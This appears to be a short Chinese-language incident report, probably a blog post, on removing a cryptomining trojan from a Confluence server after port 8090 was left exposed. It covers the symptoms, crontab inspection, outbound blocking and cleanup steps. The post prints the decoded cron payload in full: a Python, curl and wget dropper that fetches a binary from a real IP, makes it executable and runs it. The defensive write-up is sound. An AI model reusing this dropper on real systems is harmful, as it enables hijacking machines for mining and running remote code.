原因
木马通过Atlassian Confluence的端口后门入侵了confluence账号
安装时临时开了一下8090端口,后忘记关闭
避免措施
- 安装软件时修改默认端口
- 安装完成后立即关闭端口,用反向代理访问
症状
CPU占用100%
一个主进程占用CPU 100%,用户名confluence,Command为* **
多个其他进程不怎么占用CPU,用户名confluence,Command为ufw(不知道这个进程具体作用,但解决后发现切换confluence用户一直被踢出跟这个进程有关,而不是主进程)
主进程被Kill后恢复
切换confluence一直被踢出
阿里云安骑士有如下异常
- 挖矿木马程序
- 访问可疑IP
- 异常登录
查杀过程
查找所有用户的crontab
cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}
发现有 * * * * * 的可疑定时任务,是Base64编码的Shell脚本,解码后如下
( if ! kill -0 15169 > /dev/null; then python -c 'import os,sys,urllib,os.path;nm=os.urandom(4).encode("hex"); hm=os.path.expanduser("~/"); paths =[hm,"/tmp/","/var/tmp/","/dev/shm/"]; l_pth=next(iter(pth for pth in paths if os.access(pth, os.F_OK|os.R_OK|os.W_OK|os.X_OK ) or []), None);h=l_pth+nm; hd = urllib.urlretrieve ("http://37.228.129.58/home/sync", h); f.close();os.system("chmod 7777 {}".format(h));os.system("chmod +x {}".format(h)); os.system("{}".format(h))' ; curl -o /dev/shm/irir http://37.228.129.58/home/sync ; chmod 777 /dev/shm/irir ; /dev/shm/irir ; wget -O /tmp/rdir http://37.228.129.58/home/sync ; chmod 777 /tmp/rdir ; /tmp/rdir ; fi )
找到下载挖矿程序的IP地址,在阿里云安全组内先禁止出方向所有端口
找到挖矿程序 /dev/shm/irir 并删除
杀掉主进程和其他进程
切换至confluence用户并删除crontab
su confluence
crontab -r
网友评论